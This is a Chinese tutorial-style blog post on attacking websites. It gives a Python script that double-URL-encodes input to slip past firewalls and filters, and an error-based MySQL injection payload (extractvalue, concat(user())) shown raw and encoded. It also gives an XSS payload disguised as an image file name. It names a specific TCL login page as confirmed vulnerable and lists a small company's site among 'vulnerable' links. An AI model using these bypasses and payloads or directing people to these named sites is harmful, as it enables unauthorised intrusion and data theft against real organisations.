赞
踩
此文章会持续更新,我会发一些已经存在漏洞的网站实例在上边,以便于大家更好直观如何进行Web攻击
本文章的所提到的网站漏洞只是本人猜想,并没有证实,如果发现有雷同的网站漏洞和纯属巧合。
第一步:关注漏洞网站
【国家信息安全漏洞共享平台】
https://www.cnvd.org.cn/
【CVE】
https://cve.mitre.org/
【漏洞盒子】斗象科技
https://planet.vulbox.com/detail/MTIxODE=
【山西鑫鼎宸科技股份有限公司】
http://www.sxxdckj.com/cms/c/qita.html?page=2
【360补天平台】
https://www.butian.net/Reward/plan/1
第二步:熟悉扫描工具
例如:
HCL AppScan Standard 【常见的扫描工具】
sqlmap_GUI【进阶版SQl注入工具】
python代码编写【手搓核弹,手动编写代码攻击】
第三步:了解各种防御手段,例如拦截XSS攻击和SQl注入,一般的代码是屏蔽特殊字段和url转译
利用python编写一段代码绕开防火墙和代码拦截
import string
payload=";p";
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += '%%25%s' % payload[i + 1:i + 3]
i += 3
else:
retVal += '%%25%.2X' % ord(payload[i])
i += 1
print (retVal)
上传这一段是写了一个url2次编码,可以绕过防火墙XSS/SQL等特殊字节
被直接屏蔽掉
mysql 数据库在搜索框中输入:
1' and extractvalue(
会有暴库的效果,但由于防火墙和代码不让你输入特殊字符和关键词,这时候就可以进行url转码变成
1%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528
这样会绕开防火墙的检测。
select * from users order by 字段 ASC ;
将字段
变成 一下语句利用mysql 函数,进行暴库
extractvalue(1,(select concat(0x7e,user())))
将一张图片名改为,即可实现xss攻击
<img src=x οnerrοr='prompt(1)'>aaaa.jpg
已经证实有网站安全问题,如有疑问可以在底下留言评论查看详细漏洞
http://cmp.tcl.com:82/Frame/Login.htm
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。